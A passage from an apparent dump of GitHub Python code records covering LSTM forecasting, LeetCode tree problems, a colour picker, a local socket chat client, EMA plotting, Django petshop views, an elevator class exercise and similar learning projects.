plot_history\n\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\nfrom timeseries.experiments.lorenz.functions.dataprep import split_mv_seq_multi_step\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import LSTM, Dense\nfrom numpy import array\n\n\ndef lstm_multi_step_mv_build(cfg, n_features):\n n_input, n_steps_out, n_nodes = cfg['n_steps_in'], cfg['n_steps_out'], cfg['n_nodes']\n model = Sequential()\n # model.add(LSTM(50, activation='relu', return_sequences=True, input_shape=(n_input, 1)))\n # model.add(LSTM(50, activation='relu'))\n model.add(LSTM(n_nodes, activation='relu', input_shape=(n_input, n_features), return_sequences=False))\n model.add(Dense((n_nodes + n_steps_out) // 2 + n_steps_out, activation='relu'))\n model.add(Dense(n_steps_out))\n model.compile(loss='mse', optimizer='adam')\n return model\n\n\ndef lstm_multi_step_mv_fit(train, cfg, plot_hist=False, verbose=0):\n n_input, n_steps_out = cfg['n_steps_in'], cfg['n_steps_out']\n n_epochs, n_batch = cfg['n_epochs'], cfg['n_batch']\n # prepare data\n X, y = split_mv_seq_multi_step(train, n_input, n_steps_out)\n n_features = X.shape[2]\n # define model\n model = lstm_multi_step_mv_build(cfg, n_features)\n # fit\n start_time = time.time()\n history = model.fit(X, y, epochs=n_epochs, batch_size=n_batch, verbose=verbose)\n train_time = round((time.time() - start_time), 2)\n if plot_hist:\n plot_history(history, title='CNN-LSTM: ' + str(cfg), plot_title=True)\n return model, train_time, history.history['loss'][-1]\n\n\n# forecast with a pre-fit model\ndef lstm_multi_step_mv_predict(model, history, cfg, steps=1):\n # unpack architectures\n n_input = cfg['n_steps_in']\n n_features = history.shape[1]\n # prepare data\n x_input = array(history[-n_input:]).reshape((1, n_input, n_features))\n # forecast\n yhat = model.predict(x_input, verbose=0)\n return yhat[0]\n\n\ndef lstm_get_multi_step_mv_funcs():\n return [lstm_multi_step_mv_predict, lstm_multi_step_mv_fit, lstm_multi_step_mv_build]\n","repo_name":"samlopezruiz/CodeProjectTimeSeries","sub_path":"src/timeseries/experiments/lorenz/multivariate/multistep/lstm/func.py","file_name":"func.py","file_ext":"py","file_size_in_byte":2106,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"8126701061","text":"#!/usr/bin/env python\n\"\"\"\n Created by ZhuYB at 2022/11/16\n\"\"\"\n# Given an integer n, return all the structurally unique BST's (binary search trees),'\n# which has exactly n nodes of unique values from 1 to n. Return the answer in any order.\n\n# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\n\nclass Solution(object):\n def generateTrees(self, n):\n \"\"\"\n :type n: int\n :rtype: List[TreeNode]\n \"\"\"\n return self.helper(1, n)\n\n def helper(self, start, end):\n if start > end:\n return [None]\n\n trees = []\n for root_val in range(start, end+1):\n left_subtrees = self.helper(start, root_val-1)\n right_subtrees = self.helper(root_val+1, end)\n for left in left_subtrees:\n for right in right_subtrees:\n curr_root = TreeNode(root_val)\n curr_root.left = left\n curr_root.right = right\n\n trees.append(curr_root)\n return trees\n \n# class Solution:\n# def generateTrees(self, n: int) -> List[Optional[TreeNode]]:\n\n# @cache\n# def generate_trees(l, r):\n# if l > r:\n# return [None]\n \n# cur = []\n# for i in range(l, r+1):\n# for left in generate_trees(l, i-1):\n# for right in generate_trees(i+1, r):\n# cur.append(TreeNode(i, left, right))\n# return cur\n \n# return generate_trees(1, n)\n","repo_name":"YingbingZhu/python_leetcode","sub_path":"tree/95. Unique Binary Search Trees II.py","file_name":"95. Unique Binary Search Trees II.py","file_ext":"py","file_size_in_byte":1683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11984879297","text":"from pynput import mouse\n\nfrom modules.gui import GuiApp\nfrom modules.mouse_monitoring import MouseMonitoringSingleton\n# inside this box the will be made screenshot\n# cursor inside this box will be in center\nfrom modules.window_screen_worker import WindowScreenWorker\n\n\n# mouse onclick handler\ndef on_click_handler(x, y, button, pressed):\n if pressed and button == mouse.Button.right:\n screenshot_img = WindowScreenWorker().getWindowScreenshot()\n r, g, b = screenshot_img.getpixel((x, y))\n\n rgb_str = f\"{r}, {g}, {b}\"\n hex_str = \"#{:02x}{:02x}{:02x}\".format(r, g, b)\n\n GuiApp.observer_obj.pixel_hex_color = hex_str\n GuiApp.observer_obj.pixel_rgb_color = rgb_str\n GuiApp.observer_obj.updateLabels()\n GuiApp.observer_obj.rgb_color = [r, g, b]\n\n\ndef main():\n gui_obj = GuiApp()\n\n # start monitoring the mouse\n mouse_obj = MouseMonitoringSingleton()\n mouse_obj.startMonitoring(on_click_handler)\n\n gui_obj.run()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"rabo452/colorpicker","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"69815154386","text":"class newNode: \n def __init__(self, data): \n self.data = data \n self.left = self.right = None\n \n# Returns true if trees with root1\n# and root2 are level by level \n# anagram, else returns false. \ndef areAnagrams(root1, root2) :\n \n # Base Cases \n if (root1 == None and root2 == None) :\n return True\n if (root1 == None or root2 == None) :\n return False\n \n # start level order traversal of \n # two trees using two queues. \n q1 = []\n q2 = [] \n q1.append(root1) \n q2.append(root2) \n \n while (1) :\n \n # n1 (queue size) indicates number \n # of Nodes at current level in first\n # tree and n2 indicates number of nodes\n # in current level of second tree. \n n1 = len(q1)\n n2 = len(q2)\n \n # If n1 and n2 are different \n if (n1 != n2):\n return False\n \n # If level order traversal is over \n if (n1 == 0): \n break\n \n # Dequeue all Nodes of current level \n # and Enqueue all Nodes of next level\n curr_level1 = []\n curr_level2 = []\n while (n1 > 0): \n node1 = q1[0] \n q1.pop(0) \n if (node1.left != None) :\n q1.append(node1.left) \n if (node1.right != None) :\n q1.append(node1.right) \n n1 -= 1\n \n node2 = q2[0] \n q2.pop(0) \n if (node2.left != None) :\n q2.append(node2.left) \n if (node2.right != None) :\n q2.append(node2.right) \n \n curr_level1.append(node1.data) \n curr_level2.append(node2.data) \n \n # Check if nodes of current levels \n # are anagrams or not. \n curr_level1.sort() \n curr_level2.sort() \n if (curr_level1 != curr_level2) :\n return False\n \n return True\n \n# Driver Code \nif __name__ == '__main__':\n \n # Constructing both the trees. \n root1 = newNode(1) \n root1.left = newNode(3) \n root1.right = newNode(2) \n root1.right.left = newNode(5) \n root1.right.right = newNode(4) \n \n root2 = newNode(1) \n root2.left = newNode(2) \n root2.right = newNode(3) \n root2.left.left = newNode(4) \n root2.left.right = newNode(5) \n if areAnagrams(root1, root2):\n print(\"Yes\") \n else: \n print(\"No\")\n","repo_name":"DDR7707/Final-450-with-Python","sub_path":"Stacks and Queues/329.Check if all levels are anagram.py","file_name":"329.Check if all levels are anagram.py","file_ext":"py","file_size_in_byte":2389,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"23774654250","text":"import threading\nimport socket\n\n\nIP = '127.0.0.1'\nPORT = 9999\nDISCONNECTION_MESSAGE = '*'\n\n\nclass Client:\n def __init__(self, IP, PORT):\n self.IP = IP\n self.PORT = PORT\n self.client = self.initialize_client(self.IP, self.PORT)\n print('Client is up and ready!!')\n self.recieve_thread = threading.Thread(target = self.recieve)\n self.recieve_thread.start()\n\n self.write_thread = threading.Thread(target = self.write)\n self.write_thread.start()\n\n def initialize_client(self, IP, PORT):\n client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n client.connect((IP, PORT))\n return client\n\n\n def recieve(self):\n while True:\n try:\n message = self.client.recv(1024).decode()\n print(message)\n except:\n print('Something went wrong...')\n self.client.close()\n break\n\n def write(self):\n while True:\n message = input('')\n self.client.send(message.encode())\n if message == DISCONNECTION_MESSAGE:\n self.client.close()\n break\n\n\n\n\nalmog = Client(IP, PORT)","repo_name":"almog674/Network-projects","sub_path":"task 12.5/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25803441431","text":"import csv\nimport sys\n\nfrom roboko_message.roboko_message import roboko\n\ndef file_create():\n try:\n with open(roboko.csv_path,'x', encoding = 'utf-8') as f:\n return 0\n except FileExistsError as e:\n return 1\n \ndef file_read(flag):\n if flag == 1:\n with open(roboko.csv_path) as csvfile:\n reader = csv.reader(csvfile)\n csvlist = [[]]\n csvlist = [row for row in reader]\n csvlist.sort(reverse = True)\n print(csvlist)\n for i in range(len(csvlist)):\n print(roboko.roboko_like_resutaurant + csvlist[i][0] + 'です。')\n print(roboko.do_you_like_resutaurant)\n user_like = input()\n if user_like.lower() == 'yes' or user_like.lower() == 'y':\n break\n elif user_like.lower() == 'no' or user_like.lower() == 'n':\n pass\n else:\n print('入力されている文字が違います。[Yes/No]')\n continue\n return csvlist\n elif flag == 0:\n pass\n else:\n sys.exit()\n\n\ndef file_write(resutaurant):\n with open(roboko.csv_path,'a') as f:\n f.write(resutaurant.title() + ',1' + '\\n')\n\ndef file_rewrite(csvlist):\n with open(roboko.csv_path,'w') as f:\n for i in range(len(csvlist)):\n f.write(csvlist[i][0].title() + ',' + str(csvlist[i][1]) + '\\n')\n\ndef file_control(csvlist,resutaurant):\n for i in range(len(csvlist)):\n if csvlist[i][0] == resutaurant.title():\n csvlist[i][1] = int(csvlist[i][1]) + 1\n break\n elif i == (len(csvlist) -1 ):\n return csvlist,0\n else:\n pass\n return csvlist,1\n\ndef main():\n flag = file_create()\n print(roboko.hello_message + roboko.who_are_you) \n user_name = input()\n csvlist = file_read(flag)\n print(user_name + roboko.where_restaurant_like)\n resutaurant = input()\n if flag == 1:\n csvlist,write_flag = file_control(csvlist,resutaurant)\n if write_flag == 1:\n file_rewrite(csvlist)\n else:\n file_write(resutaurant)\n else:\n file_write(resutaurant)\n\n print(user_name + roboko.thank_you)\n print(roboko.goodby_message)\n\nif __name__ == '__main__':\n main()\n","repo_name":"sakurasan0904/RobokoMessage","sub_path":"roboko_application.py","file_name":"roboko_application.py","file_ext":"py","file_size_in_byte":2341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7352118172","text":"#!/usr/bin/env python3\r\n\r\nfrom datetime import datetime, time, timedelta\r\n\r\ndef main():\r\n print(\"The Timer program\")\r\n print()\r\n\r\n # start timer\r\n input(\"Press Enter to start...\")\r\n start_time = datetime.now()\r\n current_time = start_time.strftime(\"%H:%M:%S\")\r\n print(\"Start time:\", current_time)\r\n print()\r\n \r\n # stop timer\r\n input(\"Press Enter to stop...\") \r\n stop_time = datetime.now()\r\n current_time2 = stop_time.strftime(\"%H:%M:%S\")\r\n print(\"Stop time: \", current_time2)\r\n print()\r\n\r\n # calculate elapsed time\r\n elapsed_time = stop_time - start_time\r\n days = elapsed_time.days\r\n minutes = elapsed_time.seconds // 60\r\n seconds = elapsed_time.seconds % 60\r\n microseconds = elapsed_time.microseconds\r\n hours = minutes // 60\r\n minutes = minutes % 60\r\n\r\n # create time object\r\n time_object = time(hours, minutes, seconds, microseconds)\r\n\r\n # display results\r\n print(\"ELAPSED TIME\")\r\n \r\n if days > 0:\r\n print(\"Days:\", days)\r\n print(\"Hours/minutes: \" + str(hours) + \":\" + str(minutes))\r\n print (\"Seconds: \" + str(seconds) + \".\" + str(microseconds))\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"22peasel/2.2-lab","sub_path":"timer.py","file_name":"timer.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70500906066","text":"import os.path\nimport pandas as pd\n\n# read training accuracy from mixed test files\nsourcedata_dir = r'/mnt/workdir/DCM/sourcedata'\nsub_list = [f'sub_{str(s).zfill(3)}' for s in range(238,250)]\nsub_list.reverse()\nsub_mix_acc = pd.DataFrame({})\nfor sub in sub_list:\n print(sub)\n mix_test_dir = os.path.join(sourcedata_dir,sub,'Behaviour','mixed_test')\n try:\n mix_test_files = os.listdir(mix_test_dir)\n for f in mix_test_files:\n if '.csv' in f:\n try:\n tmp_df = pd.read_csv(os.path.join(mix_test_dir,f))\n id = tmp_df['participant'][0]\n name = tmp_df['姓名'][0]\n ap_acc = tmp_df['ap_acc'].max()\n dp_acc = tmp_df['dp_acc'].max()\n time = tmp_df['date'][0]\n sub_mix_acc = sub_mix_acc.append({'sub_id':sub,'exp_id':id,\n 'name':name,'AP':ap_acc,'DP':dp_acc,\n 'time':time},ignore_index=True)\n except:\n print(f\"The file {f} of {sub} have bugs.\")\n except:\n print(f\"The {sub} doesn't have the directory.\")\n\n\n#%%\n# split the mix_offline performance into the 2 columns: train_ap; train_dp\ndata = pd.read_csv(r'/mnt/workdir/DCM/tmp/participants.tsv',sep='\\t')\ndata_part1 = data[:235]\ndata_part2 = data[235:]\nmix_offline_acc = data_part2['mix_offline']\n\ntrain_ap = []\ntrain_dp = []\ni = 205\nfor acc in mix_offline_acc:\n print(i)\n ap_acc,dp_acc = acc.split('/')\n train_ap.append(float(ap_acc))\n train_dp.append(float(dp_acc))\n i+=1\n\ndata_part2['train_ap'] = train_ap\ndata_part2['train_dp'] = train_dp\n\nnew_data = pd.concat([data_part1,data_part2])\nnew_data.to_csv(r'/mnt/workdir/DCM/tmp/participants.tsv',sep='\\t')\n\n\n#%%\n# check data for mixed test performance\nbeha_total_score = r'/mnt/workdir/DCM/tmp/participants.tsv'\ndata = pd.read_csv(beha_total_score,sep='\\t')\n\nequal_state = pd.DataFrame()\nfor index,sub_acc in sub_mix_acc.iterrows():\n sub_ap_acc = sub_acc['AP']\n sub_dp_acc = sub_acc['DP']\n sub_id = sub_acc['sub_id'].replace(\"_\",'-')\n sub_record_ap_acc = data[data['Participant_ID']==sub_id]['train_ap'].values[0]\n sub_record_dp_acc = data[data['Participant_ID']==sub_id]['train_dp'].values[0]\n age = data[data['Participant_ID']==sub_id]['Age'].values[0]\n time = sub_acc['time']\n if (sub_ap_acc==sub_record_ap_acc) and (sub_dp_acc==sub_record_dp_acc):\n equal_state = equal_state.append({'sub_id':sub_id,'state':'equal',\n 'data_ap':sub_ap_acc,'data_dp':sub_dp_acc,\n 'doc_ap':sub_record_ap_acc,'doc_dp':sub_record_dp_acc,\n 'Age':age,'time':time},\n ignore_index=True)\n else:\n if sub_id in equal_state['sub_id'].to_list():\n continue\n else:\n equal_state = equal_state.append({'sub_id':sub_id,'state':'not equal',\n 'data_ap':sub_ap_acc,'data_dp':sub_dp_acc,\n 'doc_ap':sub_record_ap_acc,'doc_dp':sub_record_dp_acc,\n 'Age':age,'time':time},\n ignore_index=True)\n","repo_name":"YukunQu/DCM","sub_path":"analysis/behaviour/mixtest_acc.py","file_name":"mixtest_acc.py","file_ext":"py","file_size_in_byte":3404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"69968483666","text":"f = open('/home/kwanghyun_su/pk_base_usage.txt')\n\nfnNames = []\n\n\"\"\"\ntest = 'sadasd base::hi'\npos = test.find('//')\nbp = test.find('base::')\nprint('pos is' + str(pos))\nprint('bp is' + str(bp))\n\"\"\"\n\n\n\nfor line in f :\n pos1 = line.find('base::')\n commentPos = line.find('//')\n if commentPos != -1 and commentPos < pos1 :\n continue\n\n qtPos = line.find('\\\"')\n if qtPos != -1 and qtPos < pos1 :\n continue\n\n unittestPos = line.find('unittest')\n if unittestPos == 1 :\n print(\"Found unittest. Continuing...\", line)\n continue\n\n if pos1 == -1 :\n print(\"found outlier\")\n print(pos1, \", \", pos2, \", \", fnname, \", \", line)\n continue\n\n pos2 = len(line) # Begin with the length of the current line\n\n blankPos = line.find(' ', pos1)\n if blankPos != -1 and blankPos < pos2 :\n pos2 = blankPos\n\n openParenPos = line.find('(', pos1)\n if openParenPos != -1 and openParenPos < pos2 :\n pos2 = openParenPos\n\n closeParenPos = line.find(')', pos1)\n if closeParenPos != -1 and closeParenPos < pos2 :\n pos2 = closeParenPos\n\n ampPos = line.find('&', pos1)\n if ampPos != -1 and ampPos < pos2 :\n pos2 = ampPos\n\n asteriskPos = line.find('*', pos1)\n if asteriskPos != -1 and asteriskPos < pos2 :\n pos2 = asteriskPos\n\n commaPos = line.find(',', pos1)\n if commaPos != -1 and commaPos < pos2 :\n pos2 = commaPos\n\n semiColonPos = line.find(';', pos1)\n if semiColonPos != -1 and semiColonPos < pos2 :\n pos2 = semiColonPos\n\n openBracketPos = line.find('<', pos1)\n if openBracketPos != -1 and openBracketPos < pos2 :\n pos2 = openBracketPos\n\n closeBracketPos = line.find('>', pos1)\n if closeBracketPos != -1 and closeBracketPos < pos2 :\n pos2 = closeBracketPos\n \n # Cut from pos1 to pos2 \n fnName = line[pos1:pos2]\n\n # List the api name if unique \n if not fnName in fnNames :\n fnNames.append(fnName)\n\nf.close()\n\nwith open('/home/kwanghyun_su/pk_base_usage_unique_new.txt', 'w') as of :\n for name in fnNames :\n of.write(name + \"\\n\")\n\n","repo_name":"KyleJung0828/env","sub_path":"scripts/getFnUsages.py","file_name":"getFnUsages.py","file_ext":"py","file_size_in_byte":2115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43588306557","text":"from greenlet import greenlet\n# from flask import Flask\n# app = Flask(__name__)\n\n\ndef func1():\n # 第一步\n print(1)\n # 第二步跳转到func2函数进行执行\n gr2.switch()\n # 第五步\n print(2)\n # 第六步跳转回func2函数进行执行\n gr2.switch()\n\n\ndef func2():\n # 第三步\n print(3)\n # 第四步跳转回func1函数进行执行\n gr1.switch()\n # 第五步\n print(4)\n\n\n# 对greenlet进行调用,并且传入func1与func2\ngr1 = greenlet(func1)\ngr2 = greenlet(func2)\n\n\n# 执行func1的函数\ngr1.switch()\n","repo_name":"ChenYibin23/python","sub_path":"单线程异步协程/greenlet.py","file_name":"greenlet.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28449051192","text":"# EMAHelperFunctions.py\n\n#################################################################\n\n## Libraries\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\n################################################################\n\n## Exponential Moving Average (EMA) Functions\n\n# Calculate the alpha value for a desired period.\ndef calculateAlpha(ema_period):\n alpha = 2.0 / (ema_period + 1)\n return alpha\n\n\n# Returns the denominator\ndef getDenominator(number_of_terms):\n # bottom = 1 + (1-a) + (1-a)^2 + (1-a)^3 + ...\n a = calculateAlpha(number_of_terms)\n i = 0\n total = 0\n while i < number_of_terms:\n term = (1-a)**i\n total = total + term\n i = i + 1\n return total\n\n\n# Returns the numerator\ndef getNumerator(price_data, price_data_index, number_of_terms):\n # top = p1 + (1-a)*p2 + (1-a)^2*p3 + (1-a)^3*p4 + ...\n a = calculateAlpha(number_of_terms)\n i = 0\n total = 0\n while i < number_of_terms:\n price = price_data[price_data_index - i]\n cof = (1-a)**i\n term = price * cof\n total = total + term\n i = i + 1\n return total\n\n\n# Returns a single Exponential Moving Average value.\ndef getEMA(price_data, price_data_index, number_of_terms):\n if (number_of_terms - price_data_index) > 1:\n # There are too many terms for the given index.\n return 0\n else:\n top = getNumerator(price_data, price_data_index, number_of_terms)\n bottom = getDenominator(number_of_terms)\n EMA = np.array([top / bottom])\n return EMA\n\n \n# Returns a list of all EMA values.\ndef getEMAdataset(price_data, number_of_terms):\n ema_data = np.zeros(np.size(price_data))\n i = 0\n while i < np.size(price_data):\n datum = getEMA(price_data, i, number_of_terms)\n ema_data[i] = datum\n i = i + 1\n return ema_data\n\n\n\n####################################################################\n\n## Plotting Function\n\n# Plots 3 lines: raw data, EMA(period_1), EMA(period_2)\ndef calculateAndPlotEMA(data, ema_period_1, ema_period_2):\n ema_1 = getEMAdataset(data, ema_period_1)\n ema_2 = getEMAdataset(data, ema_period_2)\n x = np.arange(len(data))\n plt.plot(x, data)\n plt.plot(x, ema_1)\n plt.plot(x, ema_2)\n ema_legend_text_1 = \"EMA(\" + str(ema_period_1) + \")\"\n ema_legend_text_2 = \"EMA(\" + str(ema_period_2) + \")\"\n plt.legend(['Value', ema_legend_text_1, ema_legend_text_2])\n plt.title(\"Exponential Moving Averages\")\n plt.grid(b=True, which='major', color='gray', linestyle=':')\n plt.show()\n \n########################################################################\n\n## Sine Wave Function\n\n# Generates a sine wave.\ndef generateSineWave(period, amplitude, sigma, end):\n # Equations\n alpha = amplitude / 2.0\n beta = 2.0 * np.pi / period\n frequency = 1.0 / period\n x = np.arange(end + 1)\n \n # Formula\n y = alpha * np.sin(beta * x) + sigma\n return y\n","repo_name":"kilolux/fsp-demos","sub_path":"EMAHelperFunctions.py","file_name":"EMAHelperFunctions.py","file_ext":"py","file_size_in_byte":2927,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"45110889676","text":"from django.shortcuts import render\n#from django.http import HttpResponse\nfrom base.forms import ContatoForm, ReservaForm\nfrom base.models import Contato\n\ndef inicio(request):\n return render(request, 'inicio.html')\n\ndef contato(request):\n sucesso = False\n form = ContatoForm(request.POST or None)\n if form.is_valid():\n sucesso = True\n form.save()\n contexto = {\n 'telefone': '(99) 99999.9999',\n 'responsavel': 'Jackson Moreira',\n 'form': form,\n 'sucesso': sucesso\n } \n return render(request, 'contato.html', contexto)\n\ndef reserva_banho(request):\n sucesso = False\n if request.method == 'GET':\n form = ReservaForm()\n else:\n form = ReservaForm(request.POST)\n if form.is_valid():\n sucesso = True\n contexto = {\n 'nomepet': input(''),\n 'telefone': input(''),\n 'dia': input(''),\n 'mensagem': input(''), \n 'form': form,\n 'sucesso': sucesso\n }\n return render(request, 'reserva_banho.html', contexto)","repo_name":"JacksonSMoreira/petshop_isa","sub_path":"base/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14332154386","text":"\n#\n# array = list()\n\narray = [4,3,12,14,43,2,1,33,22,5]\n\n# size = int(input(\"Enter the size of array : \"))\n\n\n\n# for index in range(size):\n# number = int(input(f\"array[{index}] : \"))\n# array.append(number)\n\ndef insertion_sort(array):\n\n if array[0] > array[1]:\n temp = array[0]\n array[0] = array[1]\n array[1] = temp\n\n for i in range(2, len(array)):\n\n j = i\n while j > 0 and array[j] <= array[j-1]:\n temp = array[j]\n array[j] = array[j-1]\n array[j - 1] = temp\n j -= 1\n\n\n\nprint(array)\ninsertion_sort(array)\nprint(array)\n\n","repo_name":"Black-Spades-Z/Computer_Algorithms","sub_path":"Insertion_Sort.py","file_name":"Insertion_Sort.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12743720078","text":"def nextLargerNodes(head):\n \"\"\"\n :type head: ListNode\n :rtype: List[int]\n \"\"\"\n result = []\n stack = []\n i = 0\n while head:\n result.append(0)\n while stack and stack[-1] < head.val:\n result[stack.pop()[0]] = head.val\n stack.append([i, head.val])\n i += 1\n head = head.next\n return result","repo_name":"hlcr/Leetcode","sub_path":"1019.py","file_name":"1019.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1959254673","text":"import json\n\n\ndef parseData(squadData):\n squadData = squadData[\"data\"]\n titles = []\n qCount = []\n\n for data in squadData:\n qas = []\n count = 0\n\n titles.append(data[\"title\"])\n\n for _data in data[\"paragraphs\"]:\n qas.append(_data[\"qas\"])\n\n for _data in qas:\n for _ in _data:\n count += 1\n\n qCount.append(count)\n \n print(len(titles),len(qCount))\n\n with open(\"counts.txt\", \"w+\") as f:\n for count in qCount:\n count = str(count) + \"\\n\"\n f.write(count)\n\n\nif __name__ == \"__main__\":\n # Read Questions from json\n with open(\"squadData.json\") as data:\n data = json.load(data)\n\n parseData(data)\n","repo_name":"saurav-singh/Exatas","sub_path":"Squad Analysis/analyze.py","file_name":"analyze.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28507477909","text":"'''Реализовать класс лифта Elevator. Класс должен обладать методом, lift, отвечающий за вызов лифта.\r\nПри сложении/вычитании экземпляров класса должно возвращаться значение производимой математической операции.\r\nЕсли производить вычитание у лифта, который еще не совершал поднятий, должна быть выведена ошибка неправильной операции.\r\nПредусмотреть возможность сравнения какой из лифтов совершил большее количество поднятий.\r\nТакже необходимо предусмотреть подсчет общего количества поднятий всех лифтов.\r\nПри строчных операциях необходимо вывести детальную информацию по лифту: наименование,\r\nколичество поднятий и процент от общего количества поднятий всех лифтов.'''\r\n\r\n\r\nclass Elevator:\r\n total = 0\r\n\r\n def __init__(self):\r\n self.call_lift = 0\r\n\r\n def lift(self):\r\n Elevator.total += 1\r\n self.call_lift += 1\r\n print(self.call_lift)\r\n return self.call_lift\r\n\r\n def __sub__(self, value):\r\n try:\r\n if value == 0:\r\n raise MyError\r\n except MyError:\r\n print('Error! this lift was not called')\r\n return value - self.call_lift\r\n\r\n def __rsub__(self, value):\r\n try:\r\n if self.call_lift == 0:\r\n raise MyError\r\n except MyError:\r\n print('Error! this lift was not called')\r\n return self.call_lift - value\r\n\r\n def __add__(self, value):\r\n return value + self.call_lift\r\n\r\n def __radd__(self, value):\r\n return self.call_lift + value\r\n\r\n @staticmethod\r\n def percent(value):\r\n return value/(Elevator.total/100)\r\n\r\n\r\nclass MyError(Elevator):\r\n pass\r\n\r\n\r\ndef my_percent(): # asking about name lift and print percent of total\r\n print('your lifts: ' + str(list_name))\r\n for_per = input('enter name lift: ')\r\n if for_per in list_name:\r\n ind_per = list_name.index(for_per)\r\n print('percentage of total ' + str(Elevator.percent(list_obj[ind_per].call_lift)))\r\n else:\r\n print('check input name and try again')\r\n my_percent()\r\n return\r\n\r\n\r\ndef mat_op(): # all mathematical operations\r\n op = input('What do you want? addition - a, subtraction - s, percent - p, greatest value call - g? ')\r\n if op == 'a': # asking 2 names lift and printing add\r\n print('your lifts: ' + str(list_name))\r\n first_lift = input('enter name first lift: ')\r\n second_lift = input('enter name second lift: ')\r\n if first_lift and second_lift in list_name:\r\n ind1 = list_name.index(first_lift)\r\n ind2 = list_name.index(second_lift)\r\n print('your result add ' + str(list_obj[ind1] + list_obj[ind2]))\r\n navigation()\r\n else:\r\n print('check input names and try again')\r\n mat_op()\r\n\r\n elif op == 's': # asking 2 names lift and printing sub\r\n print('your lifts: ' + str(list_name))\r\n first_lift = input('enter name first lift: ')\r\n second_lift = input('enter name second lift: ')\r\n if first_lift and second_lift in list_name:\r\n ind1 = list_name.index(first_lift)\r\n ind2 = list_name.index(second_lift)\r\n print('your result sub' + str(list_obj[ind1] - list_obj[ind2]))\r\n navigation()\r\n else:\r\n print('check input names and try again')\r\n mat_op()\r\n elif op == 'p': # asking about name lift and displays percentage of total\r\n my_percent()\r\n navigation()\r\n elif op == 'g': # asking about names 2 lifts and displays the name with the most elevations\r\n print('your lifts: ' + str(list_name))\r\n first_lift = input('enter name first lift: ')\r\n second_lift = input('enter name second lift: ')\r\n if first_lift and second_lift in list_name:\r\n ind1 = list_name.index(first_lift)\r\n ind2 = list_name.index(second_lift)\r\n if list_obj[ind1] > list_obj[ind2]:\r\n print('this lift caused more' + first_lift)\r\n else:\r\n print('this lift caused more' + second_lift)\r\n else:\r\n print('check input names and try again')\r\n mat_op()\r\n else:\r\n print('i do not know what do you want')\r\n navigation()\r\n\r\n\r\ndef navigation():\r\n nav = input('What will we do? s - start call lift, c - calculation, e - exit ')\r\n if nav == 's':\r\n start_l()\r\n elif nav == 'c':\r\n mat_op()\r\n elif nav == 'e':\r\n exit()\r\n else:\r\n print('i do not know this command')\r\n navigation()\r\n\r\n\r\ndef start_l(): # overloads method lift, ask about name for loads\r\n start_lift = input('what lift need call? ' + str(list_name) + ': ')\r\n if start_lift in list_name:\r\n ind = list_name.index(start_lift)\r\n list_obj[ind].lift()\r\n start_l()\r\n else:\r\n print('this lift does not exist')\r\n navigation()\r\n\r\nlift_num = int(input('enter number of lifts: ')) # numbers of obj\r\nlist_name = [input('enter name lift: ') for i in range(lift_num)] # name for all obj\r\nlist_obj = [Elevator() for j in list_name] # make obj for each name\r\n\r\nstart_l()\r\n","repo_name":"dekamiron/my_first_attempt","sub_path":"homeWork09/task00.py","file_name":"task00.py","file_ext":"py","file_size_in_byte":5673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12912420799","text":"#2. Escribir funciones para:\n# a. Generar una lista de 50 números aleatorios del 1 al 100.\n# b. Recibir una lista como parámetro y devolver True si la misma contiene algún\n# elemento repetido. La función no debe modificar la lista.\n# c. Recibir una lista como parámetro y devolver una nueva lista con los elementos\n# únicos de la lista original, sin importar el orden.\n# Combinar estas tres funciones en un mismo programa\n\n\nimport random\n\n\ndef crearlista(elementos):\n lista = []\n for i in range(elementos):\n lista.append(random.randint(0, 100))\n return lista\n\n\ndef repeticionvalorlista(lista):\n \"\"\"Chequea si una lista tiene elementos repetidos\"\"\"\n rep = False\n for i in range(len(lista)):\n if lista.count(lista[i]) >= 1:\n rep = True\n break\n return rep\n\n\ndef borrarrepetidos(lista):\n \"\"\"Toma una lista y devuelve otra con los elementos únicos\"\"\"\n nuevalista = []\n for i in range(len(lista)):\n if lista.count(lista[i]) == 1:\n nuevalista.append(lista[i])\n return nuevalista\n\nelementos = random.randint(1, 